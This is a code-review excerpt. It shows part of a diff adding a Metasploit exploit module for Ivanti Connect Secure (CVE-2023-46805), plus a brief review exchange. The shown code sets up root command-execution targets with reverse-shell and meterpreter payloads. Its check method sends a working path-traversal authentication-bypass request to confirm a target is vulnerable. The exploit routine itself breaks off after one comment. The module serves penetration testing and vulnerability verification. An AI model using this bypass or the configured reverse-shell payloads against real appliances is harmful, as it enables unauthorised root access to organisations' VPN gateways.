modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb

```diff
@@ -0,0 +1,144 @@
+        ],
+        'DisclosureDate' => '2024-01-10',
+        'Platform' => %w[linux unix],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true, # Code execution as root.
+        'Targets' => [
+          [
+            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
+            # cmd/linux/http/x64/meterpreter/reverse_tcp
+            # cmd/linux/http/x64/shell/reverse_tcp
+            # cmd/linux/http/x86/shell/reverse_tcp
+            'Linux Command',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_CMD]
+            },
+          ],
+          [
+            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
+            # cmd/unix/python/meterpreter/reverse_tcp
+            # cmd/unix/reverse_bash
+            # cmd/unix/reverse_python
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => [ARCH_CMD]
+            },
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'FETCH_WRITABLE_DIR' => '/tmp'
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve
+    # the target system version information. If this requests succeeds, the target is vulnerable.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    # If the vendor mitigation has been applied, the request will return 403 Forbidden.
+    return CheckCode::Safe if res.code != 200
+
+    # By here we know the target is vulnerable, we can pull out the exact version information from the response, this
+    # is only for display purposes, we dont need to test the version information.
+
+    begin
+      json_data = JSON.parse(res.body)
+
+      name = json_data.dig('software-inventory', 'software', 'name')
+      version = json_data.dig('software-inventory', 'software', 'version')
+      build = json_data.dig('software-inventory', 'software', 'build')
+
+      return Exploit::CheckCode::Vulnerable("#{name} #{version} (#{build})") unless name.nil? || version.nil? || build.nil?
+    rescue JSON::ParserError
+      return CheckCode::Unknown('Failed to parse JSON data')
+    end
+
+    # Fall through to here if we got a JSON response but it didnt contain the keys we expected.
+    CheckCode::Unknown('No version information in response')
+  end
+
+  def exploit
+    # NOTE: The Linux payloads only work when we bootstrap them using the below technique.
```

Comment:
Do you know the reason why?

Reply:
This has been resolved as per https://github.com/rapid7/metasploit-framework/pull/18708#discussion_r1457218882, marking this comment as resolved.